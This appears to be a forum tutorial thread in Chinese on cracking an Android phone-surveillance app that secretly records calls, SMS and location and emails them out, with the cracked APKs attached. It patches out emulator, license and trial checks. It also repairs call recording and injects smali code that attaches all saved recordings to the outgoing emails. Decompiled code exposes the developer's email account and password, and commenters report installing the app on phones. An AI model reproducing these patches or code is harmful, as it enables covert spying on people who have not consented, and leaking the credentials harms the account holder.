某通信监控软件爆破分析(2014.12.25更新)

lies2014 · 发表于 2014-12-17 12:50

本帖最后由 lies2014 于 2014-12-25 11:08 编辑

某通信监控软件爆破分析

注：本APP会有杀软报毒，不过其本身就类似木马，介意的朋友请慎下。

使用用具：APKIDE（改之理）

IDA Pro

Arm汇编转换器

UltraEdit

先运行软件，出来启动界面后居然退出了，我用的2.2版本Android SDK模拟器，是不是版本问题？换了4.x的，现象依然一样，第一反应是APP检测了模拟器环境。

那么就反编译出来看看吧。将软件apk用APKIDE反编译，看起来很顺利，分析AndroidManifest.xml，找到主Activity为com.vipios.activity.MainActivity，找到相应目录下的MainActivity.smali，打开，很长很不直观啊，看看Java代码吧，打开Java源码的菜单居然灰色不可选，看着反编译出来的类名和smali内容很工整啊，没有混淆过，不甘心啊。

是什么问题呢？dex中有什么猫腻呢？IDA Pro是时候该出场了。将apk拖入IDA，选择classes.dex进行分析。既然是来找问题的，分析完直接Ctrl-Q查看问题代码，看到吗，不少哦！

点击第一处CODE，看到的代码不知所云，Source file也没解析出来：

这部分代码所属public java.lang.String android.a.a()对应smali\android\a.smali文件，在APKIDE中打开，看到source "\nSDK\u7248\u672c:"，这个明显是为了干扰反编译程序植入的垃圾代码，直接删除a.smali。

余下的问题代码同样处理，删除完垃圾smali后，在APKIDE中编译通过，然后再反编译刚才编译出来的apk，打开Java源码的菜单可选了，打开看看，很漂亮的代码，Bingo！（注：这个apk不能运行，后面的修改都是建立在原包的基础上的）

来到MainActivity看看，onStart中调用的isMoni()这个函数从名字到长相都很可疑，看看代码：

[Java] 纯文本查看 复制代码

  private boolean isMoni()
  {
    String str = ((TelephonyManager)getSystemService("phone")).getDeviceId();
    return (str != null) && (str.trim().length() != 0) && (!str.matches("0+"));
  }

获取IMEI并判断是否符合模拟器的特征，返回0即是模拟器，就是它了。修改相应的smali，函数返回前的return v2前加上const/4 v2, 0x1，让其返回1，编译，模拟器上运行，界面出来了。随便填入个邮箱，提示我开启手机网络。

邮箱是否可用由我说了算，干嘛要测试？干掉它！查找字符串，定位到testSave函数。

[Java] 纯文本查看 复制代码

    if (!OtherOperatorService.check3Gwifi(getApplicationContext()))
    {
      Toast.makeText(getApplicationContext(), "先开启手机网络,以便测试邮箱是否可用", 1).show();
      return;
    }

对应smali中的：

[Plain Text] 纯文本查看 复制代码

    invoke-static {v3}, Lcom/vipios/service/OtherOperatorService;->check3Gwifi(Landroid/content/Context;)Z
    move-result v3
    if-nez v3, :cond_3

通过check3Gwifi函数检测网络是否打开，结果为0则表示网络没有打开，出现提示。直接将最后的if-nez v3, :cond_3改为goto :cond_3。通过对check3Gwifi的调用搜索发现ZhuceActivity中也有一个判断，同样毙掉了。

再运行，输入邮箱点保存，这次出来“开启你邮箱SMTP服务(查看帮助)，或邮箱或密码输入错误；或更换邮箱重试！”，查到代码调用，在MainActivity.testSave中：

[Java] 纯文本查看 复制代码

    Thread localThread = new Thread(new Runnable()
    {
      public void run()
      {
        String str1 = MainActivity.this.smtpTemp;
        String str2 = MainActivity.this.portTemp;
        String str3 = MainActivity.this.userEmailTemp;
        String str4 = MainActivity.this.userPasswordTemp;
        String str5 = MainActivity.this.userEmailTemp;
        String[] arrayOfString = new String[1];
        arrayOfString[0] = MainActivity.this.userEmailTemp;
        MailSenderInfo localMailSenderInfo = new MailSenderInfo(str1, str2, str3, str4, true, str5, arrayOfString, MainActivity.this.subject, MainActivity.this.content);
        if (new SimpleMailSender().sendHtmlMail(localMailSenderInfo))
        {
          MainActivity.testok = 1;
          MainActivity.this.userSave();
          return;
        }
        MainActivity.testok = 2;
      }
    });
    localThread.start();
    try
    {
      localThread.join();
      if (testok == 1)
      {
        Toast.makeText(getApplicationContext(), "恭喜你，保存成功", 1).show();
        setUserEditedStates(false);
        this.subject = (this.userEmailTemp + "-" + this.shoujiImei + "正在测试" + OtherOperatorService.getVersionName(this) + "版(" + getPackageName() + "-" + "" + "-" + "finspy_vip@163.com" + ")");
        this.content = ("设定邮箱：" + this.userEmailTemp + "(" + this.userPasswordTemp + ")绑定号码：" + this.userPhoneNumberTemp + ";设置功能：" + this.tonghuajiluTemp + "," + this.duanxinjiluTemp + "," + this.tonghualuyinTemp + "," + this.weizhijiluTemp + "," + this.qqjiluTemp + "," + this.weixinjiluTemp + ";发送设置：" + this.allnetTemp + "," + this.wifiTemp + "；SDK版本:" + Build.VERSION.SDK_INT + "；" + "Model型号:" + Build.MODEL + "；Android版本：" + Build.VERSION.RELEASE + "<br/>当前卡号及编码" + this.NativePhoneNumber + "," + this.IMSI + "(" + OtherOperatorService.getCardName(this.IMSI) + ")" + LocationEmailInfo.getBaiduMaplink());
        OtherOperatorService.uploadEmail(OtherOperatorService.getUserSmtp("tyling7775@yeah.net"), OtherOperatorService.getUserPort("tyling7775@yeah.net"), "tyling7775@yeah.net", "tyling132014", "tyling7775@yeah.net", new String[] { "finspy_vip@163.com" }, this.subject, this.content);
        testok = 0;
        return;
      }
    }
    catch (InterruptedException localInterruptedException)
    {
      do
      {
        for (;;)
        {
          testok = 2;
        }
      } while (testok != 2);
      Toast.makeText(getApplicationContext(), "开启你邮箱SMTP服务(查看帮助)，或邮箱或密码输入错误；或更换邮箱重试！", 1).show();
      testok = 0;
    }

向上看，有“恭喜你，保存成功”的字样，要保存成功，必须转到这里执行，转到这里执行的条件是testok == 1，再向上看，testok在run函数中赋值，直接修改赋值就可以了。Run函数在MainActivity$4.smali中，赋值前会发邮件进行验证判断，将验证部分也干掉，将“invoke-direct/range {v0 .. v9},Lcom/illyb/mail/MailSenderInfo;-><init>”至“if-eqz v10, :cond_0”的内容全部删除。即直接将v5（初始化为1）赋值给testok后返回。编译后运行，提示保存成功了。

下面到注册了，点击注册按钮，出来注册界面。随意输入注册码，点击“注册保存”，提示“请检查注册码是否正确”。查找提示，来到ZhuceActivity. saveHide函数：

[Java] 纯文本查看 复制代码

  public void saveHide(View paramView)
  {
    String str = this.zhucemaeEditText.getText().toString().trim().toUpperCase(Locale.US);
    if (this.isRegOK)
    {
      startActivity(new Intent(this, AnyuActivity.class));
      return;
    }
    if (!OtherOperatorService.check3Gwifi(this))
    {
      Toast.makeText(getApplicationContext(), "先开启手机网络以便为你注册", 1).show();
      return;
    }
    if (!this.ps.isUserSetOk())
    {
      Toast.makeText(this, "返回先设置邮箱，并保存成功", 1).show();
      return;
    }
    if (("".equals(str)) || (str == null))
    {
      Toast.makeText(this, "请先输入注册码", 1).show();
      return;
    }
    this.isRegOK = NativeClass.userSaveReg(this, this.ps.getPackName(), this.ps.getUserEmail(), this.ps.getShoujiImei(), str, 0);
    if (this.isRegOK) {
      Toast.makeText(this, "恭喜你注册成功", 1).show();
    }
    for (;;)
    {
      try
      {
        Thread.sleep(1000L);
        finish();
        return;
      }
      catch (Exception localException)
      {
        return;
      }
      Toast.makeText(this, "请检查注册码是否正确", 1).show();
    }
  }

向上看到“恭喜你注册成功”的字样，心中窃喜，So Easy！修改对应smali，运行，结果很伤自尊。老兄，没这么好混的好不好。

再看，isRegOK要置1就注册成功，前面调用了NativeClass.userSaveReg，这个又是什么呢？看看NativeClass中的声明publicstatic native boolean userSaveReg，是个native函数啊，位于名为illyb的库中，没办法，硬着头皮上吧。

IDA再次出手，找到lib下的libillyb.so，拖入IDA中分析。在IDA的Exports页面下找到Java_com_illyb_main_NativeClass_userSaveReg，点击来到函数地址，满眼的ARM指令啊，好在我们有屠A宝刀，按F5看看伪代码：

[C++] 纯文本查看 复制代码

int __fastcall Java_com_illyb_main_NativeClass_userSaveReg(int a1, int a2, int a3, int a4, int a5, int a6, int a7, int a8)
{
  int v8; // r4@1
  int v9; // ST0C_4@1
  int v10; // r5@1
  int v11; // r6@1
  char *v12; // r7@1
  int v13; // ST0C_4@1
  int v14; // r0@1
  int v15; // r5@1
  int v16; // r0@1
  int v17; // r0@1
  int v18; // r0@3
  int result; // r0@3
  int v20; // r0@4

  v8 = a1;
  v9 = ((int (*)(void))sub_919C)();
  v10 = sub_919C(v8, a5);
  v11 = sub_919C(v8, a6);
  v12 = (char *)sub_919C(v8, a7);
  v13 = areYouOk(v9, v10, v11, v12, a8);
  _JNIEnv::ReleaseStringUTFChars(v8, a5, v10);
  _JNIEnv::ReleaseStringUTFChars(v8, a6, v11);
  _JNIEnv::ReleaseStringUTFChars(v8, a7, v12);
  v14 = (*(int (__fastcall **)(int, _DWORD))(*(_DWORD *)v8 + 24))(v8, "com/illyb/tool/OperatorService");
  v15 = v14;
  v16 = _JNIEnv::GetStaticMethodID(v8, v14, "getRegTimes", "(Landroid/content/Context;Ljava/lang/String;)I");
  v17 = _JNIEnv::CallStaticIntMethod(v8, v15, v16);
  if ( v13 && v17 <= 4 )
  {
    v18 = _JNIEnv::GetStaticMethodID(v8, v15, "saveReg", "(Landroid/content/Context;Ljava/lang/String;)Z");
    result = _JNIEnv::CallStaticBooleanMethod(v8, v15, v18);
  }
  else
  {
    v20 = _JNIEnv::GetStaticMethodID(v8, v15, "saveRegTimes", "(Landroid/content/Context;I)Z");
    _JNIEnv::CallStaticBooleanMethod(v8, v15, v20);
    result = 0;
  }
  return result;
}

Java调用JNI函数时，a1(R0)代表JNIEnv*，a2(R1)代表thiz，a3(R2)才是第1个参数，这里a7就是传过来的注册码。这部分代码的大意是先将Java传过来的参数转换成JNI能识别的类型（由ARM代码对照JNI_ENV函数表得知sub_919C实际上是GetStringUTFChars），再由areYouOk进行注册码合法性的验证，最后根据验证结果执行后面的动作调用Java中的不同方法。从前面的分析得知userSaveReg的返回值为1 注册成功，因此不能进入else的部分。那如何跳到if里呢，取决于v13&&v17的结果，v13是areYouOk的返回值，v17是Lcom/illyb/tool/OperatorService/getRegTimes的返回值，getRegTimes代码：

[Java] 纯文本查看 复制代码

  private static int getRegTimes(Context paramContext, String paramString)
  {
    return paramContext.getSharedPreferences("reg", 0).getInt("regtimes", 0);
  }

以上代码从/data/data/com.vipios/shared_prefs/reg.xml将regtimes值取出，这个regtimes经分析为输入注册码的次数x2，那么if的条件应该是限制多次重试注册码的，那么v13&&v17的值必须<=4。

那么这里是否可以修改代码直接跳转到if里面呢？答案是可以的，但是不建议这么做，为什么呢？继续往下看。现在看来问题的关键就在areYouOk上，我们进入areYouOk的地盘，在IDA的Exports页面下找到areYouOk，点击进入，然后jump to xref：

看到了吗，共有7处调用了areYouOk，如果在上面的userSaveReg里直接修改，剩下来的函数也要一个个修改，麻烦而且容易出错。通过进入其他调用areYouOk函数进行分析，更加肯定了areYouOk就是关键，而且返回1可以满足所有函数的正确跳转。

那么我们还是来修改areYouOk吧。ARM中函数的返回值存放在R0，我们只要在返回前将R0置为1就可以了。在areYouOk中往下拉到最后，或切换到图形模式可将流程看得更清楚些，看到返回前代码为：

[Asm] 纯文本查看 复制代码

loc_9518
ADD     SP, SP, #0x1FC
MOVS    R0, R4                      ;保存返回结果
POP     {R4-R7,PC}                  ;恢复进入函数前现场

典型的函数返回代码，现在我们只要将MOVS R0, R4改为MOVS R0, #1就离胜利不远了。在IDA中切换到Hex View窗口，MOVS R0, R4机器码为20 1C，那么要改成什么呢？真是头痛啊！

最后的利器隆重登场---- Arm汇编转换器该拿下遮羞布了，以上看到一个代码两个字节，需要用thumb模式转换，转换器汇编窗口输入.code 16，再输入要转换的代码：

OK，结果出来了，上面是原来的指令MOVS R0, R4机器码为20 1C，下面为修改后的指令MOVS R0, #1机器码为01 20。

好吧，UltraEdit久等了，谢幕就由你来吧（其实这才是最后的利器）！打开libillyb.so，Ctrl-G跳转到IDA中显示的修改地址，核实无误将20 1C修改为01 20，保存，libillyb.so复制回lib目录，编译运行，提示注册成功了，请注意注册成功后下面的按钮也变了。

手贱点了一下隐藏，于是程序抽屉的图标点不动了，说程序没安装，重启后图标消失，只有卸载重装才找回来了。至此爆破结束，各位耐心看我啰啰嗦嗦到现在的看官谢谢了！

monitor_crk.rar (927.38 KB, 下载次数: 2474)

monitor.rar (945.29 KB, 下载次数: 2100)

lies2014 · 发表于 2014-12-25 03:30

本帖最后由 lies2014 于 2014-12-25 11:13 编辑

某通信监控软件爆破分析2

声明：本教程的目的是技术交流，并非提供破解软件，最后提供的修改软件也仅供对照原软件进行学习，希望大家多多交流破解技术，而不是直接向我要破解，本教程也是对该软件的最后一次分析，相信大家掌握分析的方法后，以后碰到的问题只要细心研究就有可能找到解决的办法，我不会再对该软件后续使用的问题进行更多的说明。

上次的教程出来后，很多朋友反映发过来的邮件没有附件，同时收到作者的来信等等，我再次对该软件进行了分析，发现软件确实还存在问题，有些是分析测试不完整造成的，有些是软件作者没有充分考虑兼容性造成的，有些则没有提供功能。不过这些都不是没有办法解决的问题，下面听我细细道来。

目前发现存在的问题有：测试版停止使用提示、向作者邮箱发送邮件、录音功能不能正常使用、发送的邮件没有附件，以下我来一一分析，因为有了上次分析的基础，这次我会讲的比较简单些：

一、测试版停止使用提示

使用过程中会出现以上提示，并不允许再使用软件，搜索字符串定位到MainActivity. findView()：

[Java] 纯文本查看 复制代码

    if ((this.ps.getString("packname", "").equals("MyThread")) || (this.ps.getString("port", "").equals("80")) || (this.ps.getString("smtp", "").equals("SMTP.MyThread.C0M")))
    {
      str2 = "当前版本为测试版" + OtherOperatorService.getVersionName(this) + "，已经停止使用。软件升级请联系该版本正版授权注册代{过}{滤}理qq" + "，切勿上当受骗。";
      this.yesButton.setVisibility(4);
      this.isPayButton.setVisibility(4);
    }

直接修改smali让其不进入if的地盘即可，用一个goto直接跳到if判断的后面。

二、向作者邮箱发送邮件

在第一次的分析里，保存邮箱等信息时会向作者邮箱发送邮件，调用的是OtherOperatorService.uploadEmail，现在就搜索这个函数（或者直接搜索作者的邮箱），发现在SMSBroadcastReceiver .onReceive里也调用这个函数向作者邮箱发邮件，直接在smali里将对Lcom/vipios/service/OtherOperatorService;->uploadEmail的调用注释调就好了。其他地方还有没有不记得了，有的话同样处理。

三、录音功能不能正常使用

在通话时，软件会触发系统的录音功能，并将录音（amr格式）保存到SD卡的PhoneSystem目录中，这个我是在实测的时候发现的，当然分析源码也可以找到但实测更直观一些。

几次录音发现录音文件大小一样，并且不能播放，用UltraEdit打开，发现以下字样：

[Plain Text] 纯文本查看 复制代码

SDK版本:8;Model型号:XXXXX;安卓版本:2.2.2
 
错误处:startRecording:mediaRecorder.startRecording()
错误原因：java.lang.RuntimeException: setAudioEncoder failed.
错误细节：java.lang.RuntimeException: setAudioEncoder failed.
        
 at android.media.MediaRecorder.setAudioEncoder(N
 ative Method)
        
 at com.vipios.service.PhoneService.startRecording(PhoneService.java:233)
        
 at com.vipios.service.PhoneService.access$9(PhoneService.java:222)
        
 at com.vipios.service.PhoneService$myPhoneSt
 ateListener.onCallSt
 ateChanged(PhoneService.java:149)
        
 at android.telephony.PhoneSt
 ateListener$2.handleMessage(PhoneSt
 ateListener.java:319)
        
 at android.os.Handler.disp
 atchMessage(Handler.java:99)
        
 at android.os.Looper.loop(Looper.java:123)
        
 at android.app.ActivityThread.main(ActivityThread.java:4627)
        
 at java.lang.reflect.Method.invokeN
 ative(N
 ative Method)
        
 at java.lang.reflect.Method.invoke(Method.java:521)
        
 at com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:858)
        
 at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:616)
        
 at dalvik.system.N
 ativeStart.main(N
 ative Method)

这明显不是一个amr音频，我们来看看文件内容，第一行“错误处”指明了出现问题的函数调用是在mediaRecorder.startRecording()，通过搜索定位到对于这个函数的调用出现在PhoneService. startRecording里：

[Java] 纯文本查看 复制代码

  private void startRecording(boolean paramBoolean)
  {
    if (this.paras.isTonghualuyin()) {
      try
      {
        this.mediaRecorder = new MediaRecorder();
        this.mediaRecorder.setAudioSamplingRate(16000);
        if (paramBoolean) {
          this.mediaRecorder.setAudioSource(1);
        }
        for (;;)
        {
          this.mediaRecorder.setOutputFormat(3);
          this.mediaRecorder.setAudioEncoder(1);
          this.mediaRecorder.setOutputFile(this.file.getAbsolutePath());
          this.mediaRecorder.prepare();
          this.mediaRecorder.start();
          this.isRecord = true;
          return;
          this.mediaRecorder.setAudioSource(4);
        }
        String str;
        return;
      }
      catch (Exception localException)
      {
        this.isRecord = false;
        str = OtherOperatorService.getTxtHistory(readyFile(false));
        OtherOperatorService.txtFileSave(this.file, OtherOperatorService.getException(localException, "startRecording:mediaRecorder.startRecording()") + str);
        this.paras.setErrTimes(1 + this.paras.getErrTimes());
      }
    }
  }

从前面的amr还可看到错误原因：java.lang.RuntimeException:setAudioEncoder failed，即在上述代码this.mediaRecorder.setAudioEncoder(1)处发生了错误，我们向前看，setAudioEncoder之前对录音设备做了哪些动作呢？setAudioSamplingRate设置采样率16000，setAudioSource设置音频源为MIC，setOutputFormat设置输出格式为amr，问题极有可能出在setAudioSamplingRate上，因为这个采样率的设置需要硬件支持，如果支持不好就不会工作。找到问题就修改smali，将Landroid/media/MediaRecorder;->setAudioSamplingRate一行注释掉，让其使用默认采样率，编译运行，这次录音正常了。

这个问题不一定出现在所有机器上，但我实测的两台机器都出现了，没有问题的可以不改。

上述参数也不一定适合所有机器，如果还有问题，可以考虑将音频格式和采样率都修改一下。

四、发送的邮件没有附件

根据实测发来的邮件是有附件名的，但没有相关的附件，我们根据邮件内容进行搜索，定位到邮件发送的地方是在PhoneService.myPhoneStateListener.onCallStateChanged里调用了NativeClass.userSendEmail进行邮件发送：

[Java] 纯文本查看 复制代码

NativeClass.userSendEmail(PhoneService.this.getApplicationContext(), ZhuceActivity.class, 2130837505, "温馨提示:你刚才的电话记录已为你备份至" + str6 + "邮箱", "温馨提示", str1 + "记录已为你备份至" + str6 + "邮箱", null, PhoneService.this.path, str4, str5, str6, str7, str6, new String[] { str6 }, str2, str3, PhoneService.this.paras.getPackName(), PhoneService.this.paras.getShoujiImei(), PhoneService.this.zcps.getString("zhucema", ""), OtherOperatorService.NETTIME, PhoneService.this.paras.getUseTimes(), 10);

又是个Native函数，IDA载入并F5：

[C++] 纯文本查看 复制代码

    v31 = (*(int (__fastcall **)(int, _DWORD))(*(_DWORD *)v24 + 24))(v24, "com/illyb/tool/OperatorService");
    v32 = v31;
    v33 = _JNIEnv::GetStaticMethodID(
            v24,
            v31,
            "uploadEmail",
            "(Ljava/util/List;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;[Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;)V");
    _JNIEnv::CallStaticVoidMethod(v24, v32, v33, a9);

实际上这个Native只是做了个areYouOk的验证后又把皮球踢回了Java，由com.Illyb.tool.OperatorService.uploadEmail负责进行邮件发送。来看看这个uploadEmail是怎么做的：

[Java] 纯文本查看 复制代码

uploadEmail(final List<String> paramList, final String paramString1, String paramString2, final String paramString3, final String paramString4, final String paramString5, final String paramString6, final String[] paramArrayOfString, final String paramString7, final String paramString8)
        MailSenderInfo localMailSenderInfo = new MailSenderInfo(OperatorService.this, paramString3, paramString4, paramString5, true);
        localMailSenderInfo.setFromAddress(paramString6);
        localMailSenderInfo.setReceivers(paramArrayOfString);
        localMailSenderInfo.setSubject(paramString7);
        localMailSenderInfo.setContent(paramString8);
        localMailSenderInfo.setAttachFileNames(paramList);
        if (new SimpleMailSender().sendAttachMail(localMailSenderInfo))

看到上面实际上是有附件的参数的，localMailSenderInfo.setAttachFileNames(paramList)即是。paramList是uploadEmail的第一个参数，类型为List<String>，从上面IDA的分析看到_JNIEnv::CallStaticVoidMethod(v24, v32, v33, a9)，实际上是Java_com_illyb_main_NativeClass_userSendEmail的a9参数，也就是NativeClass.userSendEmail传递到JNI的第7个参数（搞不懂为何是第7个的请温习一下上一课）。

回头再看NativeClass.userSendEmail的参数，第7个居然为null，搞什么飞机，作者压根就没有将附件的参数传过来嘛，看来这真的是个测试版！

既然还留有接口，那咱就自力更生吧，说干就干，动手。我的思路是，扫描SD卡上的PhoneSystem目录，将列表替换NativeClass.userSendEmail的null，然后嘛就木有然后了。

这个接口要放在PhoneService的NativeClass.userSendEmail之前，用Java描述是这样的：

[Java] 纯文本查看 复制代码

  String filePath=Environment.getExternalStorageDirectory. getAbsolutePath()+"/PhoneSystem";     //需要扫描的目录
  List<String> items = new ArrayList<String>(); 
  File f = new File(filePath); 
  File[] files = f.listFiles();     //列出所有文件 
  if(files != null)
  { 
    int count = files.length;     //文件个数 
    for (int i = 0; i < count; i++)
    { 
      File file = files[i]; [/i]
      items.add(file.getPath());     //文件名加入列表
}
}

上述代码转成smali，在PhoneService$myPhoneStateListener.smali里找到相应的地方进行插入：

[Plain Text] 纯文本查看 复制代码

    new-instance v1, Ljava/lang/StringBuilder;
    invoke-static {}, Landroid/os/Environment;->getExternalStorageDirectory()Ljava/io/File;
    move-result-object v2
    invoke-virtual {v2}, Ljava/io/File;->getAbsolutePath()Ljava/lang/String;
    move-result-object v2
    invoke-static {v2}, Ljava/lang/String;->valueOf(Ljava/lang/Object;)Ljava/lang/String;
    move-result-object v2
    invoke-direct {v1, v2}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    const-string v2, "/PhoneSystem"
    invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    move-result-object v1
    invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    move-result-object v1
    new-instance v8, Ljava/util/ArrayList;
    invoke-direct {v8}, Ljava/util/ArrayList;-><init>()V
    new-instance v2, Ljava/io/File;
    invoke-direct {v2, v1}, Ljava/io/File;-><init>(Ljava/lang/String;)V
    invoke-virtual {v2}, Ljava/io/File;->listFiles()[Ljava/io/File;
    move-result-object v2
    if-eqz v2, :cond_22
    array-length v3, v2
    const/4 v1, 0x0
    :goto_14
    if-ge v1, v3, :cond_22
    aget-object v4, v2, v1
    invoke-virtual {v4}, Ljava/io/File;->getPath()Ljava/lang/String;
    move-result-object v4
    invoke-interface {v8, v4}, Ljava/util/List;->add(Ljava/lang/Object;)Z
    add-int/lit8 v1, v1, 0x1
    goto :goto_14
    :cond_22

编译运行，联网的情况下呼出电话会发送邮件，并且附件及百度定位都发过来了。

五、其他说明

请正确设置邮箱及密码，邮箱SMTP功能要打开，否则不能发送邮件。

无联网时，通话记录、短信记录、通话录音均存放在SD卡PhoneSystem目录下。联网后，软件会在打出电话或收到短信时发送邮件包括以往无联网时未发送的。

安装新的软件前请彻底卸载原来的，否则有可能不能正常工作。

其他功能尚未测试，或许还存在未发现的问题，请大家自力更生丰衣足食！

ApkIDE_monitor_crk5.rar (927.44 KB, 下载次数: 3681)

hcjge · 发表于 2015-2-7 09:25

膜拜大神

15732164757 · 发表于 2015-2-7 06:00

开启防跳.txt

huxxbj · 发表于 2015-2-7 04:13

膜拜大神！！！

sumeng1985 · 发表于 2015-2-4 18:57

试用了一下，重启后就不灵了

as8680 · 发表于 2014-12-18 08:43

膜拜大神！！！

wanmei · 发表于 2014-12-17 12:57

膜拜大神！！！{:1_931:}

canyuecss · 发表于 2014-12-17 13:37

爱莫能助

无名低调me · 发表于 2014-12-17 13:48

进来看一看，学习一下知识

夏天好冷 · 发表于 2014-12-17 13:57

刚给电话装上测试了一下邮件会正常发来显示位置但是没有附件

yyz219 · 发表于 2014-12-17 15:19

进来学习谢谢分享

可怜河边无定骨 · 发表于 2014-12-18 00:55

没有附件是怎么回事？ @lies2014

可怜河边无定骨 · 发表于 2014-12-18 00:56

@lies2014 @lies2014

可怜河边无定骨 · 发表于 2014-12-18 00:59

没有附件啊大神 @lies2014

帐号		自动登录	找回密码
密码			注册[Register]

[Android 原创] 某通信监控软件爆破分析(2014.12.25更新)

点评

免费评分

本帖被以下淘专辑推荐:

某通信监控软件爆破分析（2）

免费评分